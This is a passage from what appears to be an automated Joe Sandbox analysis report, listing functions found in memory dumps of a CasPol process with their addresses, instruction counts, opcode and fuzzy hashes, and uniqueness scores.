                                                                                                    • Instruction ID: 7c36983daa896127101eb4e59a73053c4cd76ad74e8ba03d2634d2f9b89de2e7
                                                                                                    • Opcode Fuzzy Hash: 901c4fa72b487479de6d637c23692d7b77ae8687ba1e24a56bd5ccbd0cad4445
                                                                                                    • Instruction Fuzzy Hash: DC312630B083458FDB5287B888456AE3FF1AF81240F1584FBD544CB293EA34DC06C392
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F96F8, Relevance: .1, Instructions: 93COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bbd1b26846cea66ce46ea0dc5dc6765783c9cfda598bc4492c4139de7a243a5d
                                                                                                    • Instruction ID: 5d1d7255939c2af2cb49de0dd138f67ec82569fc44c1ea8044c0ad6c29d44731
                                                                                                    • Opcode Fuzzy Hash: bbd1b26846cea66ce46ea0dc5dc6765783c9cfda598bc4492c4139de7a243a5d
                                                                                                    • Instruction Fuzzy Hash: 3931C035F003189BDF10AFB888457AE7BF5AF88654F114869EA05EB341EF349D018B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F7BCF, Relevance: .1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 75bf2595cfba5f3b15e3b1cc7dd116c73a65e6e0198c588145c3ced70df853c5
                                                                                                    • Instruction ID: 18320ac5466907eff60d2ed995f9532f7c79cf5f79a6221e259c65f6474049d2
                                                                                                    • Opcode Fuzzy Hash: 75bf2595cfba5f3b15e3b1cc7dd116c73a65e6e0198c588145c3ced70df853c5
                                                                                                    • Instruction Fuzzy Hash: 2D31E330F00208ABEB159BB8D4557ADBAF2AF84304F00486DE605AB7C5DF754C45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DC2D4C4, Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5682672022.000000001DC2D000.00000040.00000001.sdmp, Offset: 1DC2D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dc2d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 63a92298d8d5ae438d1e1ef40832d200ce139d0470c6f03d3200a62c1bb08b40
                                                                                                    • Instruction ID: 0c7be91b54e13a05d65a5247838d5d43cb5419b5329376e9e31f46611daf5e10
                                                                                                    • Opcode Fuzzy Hash: 63a92298d8d5ae438d1e1ef40832d200ce139d0470c6f03d3200a62c1bb08b40
                                                                                                    • Instruction Fuzzy Hash: 8221F4B2504248DFDB01CF58D9C0B16BBA5FB98718F60C969E9080B246C3B6E446CAE3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DC2D3D8, Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5682672022.000000001DC2D000.00000040.00000001.sdmp, Offset: 1DC2D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dc2d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 12335021496fb6fd7c3dd4da91403418633088e04fb690ac782f914eacf2ea28
                                                                                                    • Instruction ID: f1ff9957c560a8487a892c5aac25dd9994f4d0025aed08fbe2333e1b70a82e52
                                                                                                    • Opcode Fuzzy Hash: 12335021496fb6fd7c3dd4da91403418633088e04fb690ac782f914eacf2ea28
                                                                                                    • Instruction Fuzzy Hash: 97212876504248DFDB01CF58D9C0F16BBA5FB98724F60C969E9490B246C336E846CBE3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DC3D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5682877756.000000001DC3D000.00000040.00000001.sdmp, Offset: 1DC3D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dc3d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2a84a3a92f7c1d49c32385841b1eec4bbeb406d8a79b671cd99893a77a8d8f57
                                                                                                    • Instruction ID: 4589b726b6a1d2e2317a557cd70d6ee5794162d76222c4d80be2ba431dc05198
                                                                                                    • Opcode Fuzzy Hash: 2a84a3a92f7c1d49c32385841b1eec4bbeb406d8a79b671cd99893a77a8d8f57
                                                                                                    • Instruction Fuzzy Hash: 9D212575604248EFCB01CF68D9C0B16BBA5FB84B19F20C96DE9490B242C33AD807CA63
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FA9B7, Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04290d97c05bd532e8edc3780e7768f8a9620b801d224005104f81013f3416d1
                                                                                                    • Instruction ID: 6d6fec34f7ea90ee5bf8ff0fca777ed39894e71a60ab044ed60cf2c082003984
                                                                                                    • Opcode Fuzzy Hash: 04290d97c05bd532e8edc3780e7768f8a9620b801d224005104f81013f3416d1
                                                                                                    • Instruction Fuzzy Hash: 4011E635B082545FDF52967898196AE3BE69BC5340F0684BADA49D7382EF34CC0983A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FAA08, Relevance: .1, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9f786d8d7d9ec6460f7fb424580ece7a033004d90f1bd809fc801f24c5befbad
                                                                                                    • Instruction ID: 37cf622cdd32618cfa99de9b53bb35926615188723c1b3938b5b70d107cafad9
                                                                                                    • Opcode Fuzzy Hash: 9f786d8d7d9ec6460f7fb424580ece7a033004d90f1bd809fc801f24c5befbad
                                                                                                    • Instruction Fuzzy Hash: 0E11E735B001288BCF14ABB8D855AAE77E6AFC8354B05497CDA06E7380DF39DC0987D2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DC3D005, Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5682877756.000000001DC3D000.00000040.00000001.sdmp, Offset: 1DC3D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dc3d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fcae51689a0b4ffd4769f00850e55be8a07e1a030a16d3508ee6347b4c0ccc98
                                                                                                    • Instruction ID: ac320e91a6db9d54b5cea3f0c30ce388aede63358509af34ae7a9e57d38c3458
                                                                                                    • Opcode Fuzzy Hash: fcae51689a0b4ffd4769f00850e55be8a07e1a030a16d3508ee6347b4c0ccc98
                                                                                                    • Instruction Fuzzy Hash: E6219F755087849FC702CF24D994B11BFB1EB46714F24C5AAD8498F296C33AD80ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F9DFF, Relevance: .1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e4c872fb91168af5b3e36359fee27e6f4d4fe873b4e45f7b4b951b97a88bf9fc
                                                                                                    • Instruction ID: a79bbd029dc66ffdd9a2d9e4d008f110bb2c1f690f23738cc675b427132a295c
                                                                                                    • Opcode Fuzzy Hash: e4c872fb91168af5b3e36359fee27e6f4d4fe873b4e45f7b4b951b97a88bf9fc
                                                                                                    • Instruction Fuzzy Hash: EB113A387082448FD7058678C8457AA3BF1DFC6388F0148BAE644CB662DB71DC06C752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DC2D3D3, Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5682672022.000000001DC2D000.00000040.00000001.sdmp, Offset: 1DC2D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dc2d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cffbe8311dc2065fb1933bb090f1e2ce6876070e4e54e7a9baa175c3eae28517
                                                                                                    • Instruction ID: eadbdd4656b0d7764b25bc665bae725e8bbd0b993a8d08c063b285fdff3fde14
                                                                                                    • Opcode Fuzzy Hash: cffbe8311dc2065fb1933bb090f1e2ce6876070e4e54e7a9baa175c3eae28517
                                                                                                    • Instruction Fuzzy Hash: 5D1103B2504284CFCB01CF14D9C0B16BF71FB94324F24C6A9D8490B616C33AE456CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DC2D4BF, Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5682672022.000000001DC2D000.00000040.00000001.sdmp, Offset: 1DC2D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dc2d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cffbe8311dc2065fb1933bb090f1e2ce6876070e4e54e7a9baa175c3eae28517
                                                                                                    • Instruction ID: c019ebb18b435f6ae69aecd22bbe02d5a2467beb37a88abfb6e79f1dd81273da
                                                                                                    • Opcode Fuzzy Hash: cffbe8311dc2065fb1933bb090f1e2ce6876070e4e54e7a9baa175c3eae28517
                                                                                                    • Instruction Fuzzy Hash: EC11D3B6904284CFCB01CF14D5C4B16BF71FB94314F24CAA9D8494B656C3B6D556CBE2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F6CEF, Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d32ba9285ec4b0b7143088a92b2931ab4e932c712c4a5d14204ec0ca1fefb90
                                                                                                    • Instruction ID: c6e5db5c90c0ab8129f81e009f8fca5277aff85f37cdb47369e2551c2905d4e4
                                                                                                    • Opcode Fuzzy Hash: 5d32ba9285ec4b0b7143088a92b2931ab4e932c712c4a5d14204ec0ca1fefb90
                                                                                                    • Instruction Fuzzy Hash: 0B01D43070D7815FD3126329D82566A7FF98BC2610F0984EFD588CB5E3CA66CC468362
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F7588, Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6738a183ec0c36580221f3a6355b302a6ee567d4353406da837d664a4e993f5d
                                                                                                    • Instruction ID: 4972f2b6b1e0d53abc0226ef75917fecd7867073b5de3b81f4b213cd7f97a31c
                                                                                                    • Opcode Fuzzy Hash: 6738a183ec0c36580221f3a6355b302a6ee567d4353406da837d664a4e993f5d
                                                                                                    • Instruction Fuzzy Hash: 2E017C71B001218FCB58EF7CC94895E7BF9AF4C61071105A9EA46D7721EB30DD008BA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FA5DF, Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cfe367eeb403c2a9c7b2eca71aae578b55ec0f288947d20acd3b64a26439b178
                                                                                                    • Instruction ID: 4423c402cfc2cad6617f650fba7cfb3e181e61dca860215900845ba0fd7f6d92
                                                                                                    • Opcode Fuzzy Hash: cfe367eeb403c2a9c7b2eca71aae578b55ec0f288947d20acd3b64a26439b178
                                                                                                    • Instruction Fuzzy Hash: 9801D139B042286BCB1467B49859AAF7BA1DFC4650F00896CEA46E7390EF799D0687C1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F79E8, Relevance: .0, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d2fb86c7659a6a37c3c5be43a18318212ba5881bccfa6e683b56fc2740175504
                                                                                                    • Instruction ID: 13a49877b1e9d58c7a21115f383af7fb2df6723fa82a47ca43f5db9ccfaf37b3
                                                                                                    • Opcode Fuzzy Hash: d2fb86c7659a6a37c3c5be43a18318212ba5881bccfa6e683b56fc2740175504
                                                                                                    • Instruction Fuzzy Hash: 90016D71E012189FDB04DFA9E545ADDBBB6FF89314F50006AE501BB391CBB19D08CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FACF0, Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e8350b91305fbc86b08a2f6c46e4d1d9fe9b077a22d7633eba0b80dd0000db34
                                                                                                    • Instruction ID: c305c0887c3e972a7c2d1625a0178ddb5486ca7994cb0c9169cd9e82b952e5cd
                                                                                                    • Opcode Fuzzy Hash: e8350b91305fbc86b08a2f6c46e4d1d9fe9b077a22d7633eba0b80dd0000db34
                                                                                                    • Instruction Fuzzy Hash: 22F0F675F052585FCB40A77848092AFBFF1DF85280B0145BAE58AD3341EA348E02C7D1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F79E7, Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ce0507d124fb8d10839805813f04b042dda00f8b1207459f7493e1c1fdd1feaf
                                                                                                    • Instruction ID: 38c46dcdc3e38f64fec0633c36ae0213faeaa169bc8098cc3e57a779b6a6448d
                                                                                                    • Opcode Fuzzy Hash: ce0507d124fb8d10839805813f04b042dda00f8b1207459f7493e1c1fdd1feaf
                                                                                                    • Instruction Fuzzy Hash: A2016D71E012189FDB04DFE8E545ADCBBB6BF89315F10046AE501BB391CBB19D08CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F74F0, Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 92863fa006a07996d1781140ae7f94f7d57280debae078209e5e0a6a947bfd17
                                                                                                    • Instruction ID: b26812af00b5683cc4359a5c79b7468f19f7bf6a6574bbd6ad60ce060477bcb8
                                                                                                    • Opcode Fuzzy Hash: 92863fa006a07996d1781140ae7f94f7d57280debae078209e5e0a6a947bfd17
                                                                                                    • Instruction Fuzzy Hash: DF01D670E002199BCB44DFB988456AEBBF5AF48644F00856AD659E7350E77899018B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FAD00, Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 45bcf5cc494dbaffde4eca404a5c6b88a1c9e8fe7de0199f4f2a0253688d18e0
                                                                                                    • Instruction ID: 81979ba20dc75bad3006a1314aeb0fee55eb912ad87fb52261d30f2d12761fef
                                                                                                    • Opcode Fuzzy Hash: 45bcf5cc494dbaffde4eca404a5c6b88a1c9e8fe7de0199f4f2a0253688d18e0
                                                                                                    • Instruction Fuzzy Hash: 32F01275F042289FCF44BBB948096AFBAF59F88691B114575DA0AE3341EB348E01C7D5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F949F, Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 28e9454bc50d1030d752f6a8648f422b7d17c93b9eac5ed5308be807894c68c0
                                                                                                    • Instruction ID: c90e2ff55075bd813b7f9eb8fe16b3c7cc8fd11a9229eaaf9de2c2f7a46867e9
                                                                                                    • Opcode Fuzzy Hash: 28e9454bc50d1030d752f6a8648f422b7d17c93b9eac5ed5308be807894c68c0
                                                                                                    • Instruction Fuzzy Hash: 57F0B42570D3C14FD75287758865A1A7FB14B92208F19C8EBD185CB9E3C934DD06C362
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F9D8F, Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 278a279cb3cbafdd7d907564cd37eea45b8e20c5aa52be81c6d275ae1fba385f
                                                                                                    • Instruction ID: da961003102913457abf882da00c7b27573ac7d046a164901527420113842877
                                                                                                    • Opcode Fuzzy Hash: 278a279cb3cbafdd7d907564cd37eea45b8e20c5aa52be81c6d275ae1fba385f
                                                                                                    • Instruction Fuzzy Hash: 80E0ED39B000188B8F44FBF8D8559ED73F1BF88654B204469E609E7751DF389C059B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F3F80, Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 64805c6300e95e3e112a7853410afa7b90861ecb7b6f5cd1681094224bf010f2
                                                                                                    • Instruction ID: 15f929a7366e92d0e849be1d9b602bc34a2e13e545fc0d9cc06bd1a7c93cc724
                                                                                                    • Opcode Fuzzy Hash: 64805c6300e95e3e112a7853410afa7b90861ecb7b6f5cd1681094224bf010f2
                                                                                                    • Instruction Fuzzy Hash: 45E09236B440208FE7098B7498983BD7BB3ABC8111F0844A9D906D3200CF384D02D740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F4AB8, Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb6ea80a7f0dca2c3a8065ae4e9bb6bab702ace775f063ac79797080ccf0bc65
                                                                                                    • Instruction ID: bd939dda00b02f8db3e835e8f547c1d03cc10ffe0f5ace7c77a7e19368655d34
                                                                                                    • Opcode Fuzzy Hash: eb6ea80a7f0dca2c3a8065ae4e9bb6bab702ace775f063ac79797080ccf0bc65
                                                                                                    • Instruction Fuzzy Hash: 0FE0C2213893051BE344907E988173BA9CA9BD4120B48C5396A49C7A82DC24DC18437E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 010FF6B8, Relevance: .1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 06e9f9dce83dd924ae6262a614b037239d3a3122143ec79e0fd2320183110e37
                                                                                                    • Instruction ID: 97aee95b196264752b5a70cba1adddb46291578cf9ec68a004a80c13f9dbb984
                                                                                                    • Opcode Fuzzy Hash: 06e9f9dce83dd924ae6262a614b037239d3a3122143ec79e0fd2320183110e37
                                                                                                    • Instruction Fuzzy Hash: 4731903170835A4FD7521B7888A13AE7797EFC2314B1848BED541CB686DF25CC168393
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%